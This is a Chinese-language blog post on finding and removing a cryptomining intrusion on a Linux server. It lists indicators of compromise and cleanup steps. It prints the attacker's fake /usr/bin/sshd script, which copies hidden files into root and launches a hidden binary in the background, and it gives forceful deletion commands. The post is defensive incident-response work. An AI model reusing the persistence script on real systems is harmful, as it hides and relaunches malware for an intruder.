root用户登录出现 -bash-4.2

Posted by 秦 on January 7, 2022

root用户登录出现 -bash-4.2

[TOC]

在修复过.bashrc文件或者恢复过.bashrc后,仍然出现-bash-4.2#,那么有可能你的机器已经被入侵了,附上我遇到的这种情况,看看对你有没有帮助。

1、确认是否被入侵

出现以下现象或存在以下目录

  • root用户登录出现 -bash-4.2#
  • netstat 命令回显为空
  • crontab -l 查看系统定时任务
  • 检查系统用户列表是否有 gh0stx, sclipicibosu, mexalzsherifu 三个或其中任意一个
  • 查看是否存在/var/tmp/.ladyg0g0/目录
  • 查看是否存在/var/tmp/.sl/目录
  • 检查/root/.ssh/authorized_keys是否存在异常

  • 查看是否存在/usr/.SQL-Unix/.SQL/.db 或者 /var/tmp/.SQL-Unix/.SQL/.db

  • 查看是否存在/usr/tmp/.ladyg0g0/.pr1nc35 或者 /var/tmp/.ladyg0g0/.pr1nc35

  • 查看是否存在/usr/bin/.pidsclip

  • 查看是否存在/usr/bin/.locationesclipiciu

  • 检查/usr/bin/sshd 内容是否是如下代码段

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    
    #!/bin/bash
    locatieasdf=$(cat /usr/bin/.locationesclipiciu)
    if [ ! -d  ]; then
            mkdir
            rsync -r /usr/bin/.locationesclipiciu/ /
            sleep 1
            /.b4nd1d0 > /dev/null 2>&1 & disown
    else
            if [ ! -f  /.dorel ]; then
                    rsync -r /usr/bin/.locationesclipiciu/ /
                    sleep 1
                    /.b4nd1d0 > /dev/null 2>&1 & disown
    fi
    

2、威胁处理

删除恶意脚本

  1. 强制删除 /var/tmp/.sl/ 目录

  2. 强制删除 /var/tmp/.ladyg0g0/ 目录

  3. 强制删除 /usr/bin/.locationesclipiciu

  4. 强制删除 /usr/bin/.pidsclip

  5. 强制删除 /root/.b4nd1d0

  6. 强制删除 /root/.dorel

  7. 强制删除 /usr/.SQL-Unix/ 目录

  8. 强制删除 /usr/tmp 目录

  9. 强制删除 /usr/bin/sshd

  10. 删除 /etc/cron.daily/man-db.cron

  11. 删除/etc/cron.hourly/0anacron

  12. 检查异常SSH公钥,排查~/.ssh/authorized_keys文件,如果发现可疑的SSH公钥,直接删除

  13. rm -rf /usr/lib/systemd/system/myservice.service

  14. 恢复.bashrc文件 cp /etc/skel/.bash* /root/

  15. 修改/root/.bashrc文件

    1
    
    export PS1='[\u@\h \W]\$'
    
  16. 删除 gh0stx, sclipicibosu, mexalzsherifu 中存在的用户

    1
    2
    3
    4
    
    vim /etc/passwd   // 删除存在得用户  
    vim /etc/shadow   // 删除存在的用户
        
    userdel –r sclipicibosu//删除不成功就使用chmod修改/etc/passwd和/etc/shadow权限,再使用vim删除该用户 
    
  17. reboot重启

  18. passwd //修改密码为强口令

3、恶意脚本分析

  1. 往系统服务中注册了一个私有服务 /lib/systemd/system/myservice.service
  2. myservice私有服务中进行了一个文件同步操作 rsync -r /usr/bin/.locationesclipiciu/
  3. 同步了 /var/tmp/.sl/ 下的内容
  4. 重写.bashrc,导致常用命令失效
  5. 后续可能进行的行为暂时不明

4、参考文章

腾讯主机安全截获TOPMiner挖矿木马,受害服务器约1.5万台 (tencent.com)

How We Tracked a Threat Group Running an Active Cryptojacking Campaign (bitdefender.com)

home (urdr-gungnir.github.io)

home (urdr-gungnir.github.io) home (urdr-gungnir.github.io)

一款“僵尸网络挖矿” 攻击分析_whatday的专栏-CSDN博客_僵尸网络挖矿

记录一次服务器被入侵,单进程CPU超过1000%_a别无所求的博客-CSDN博客_sysdrr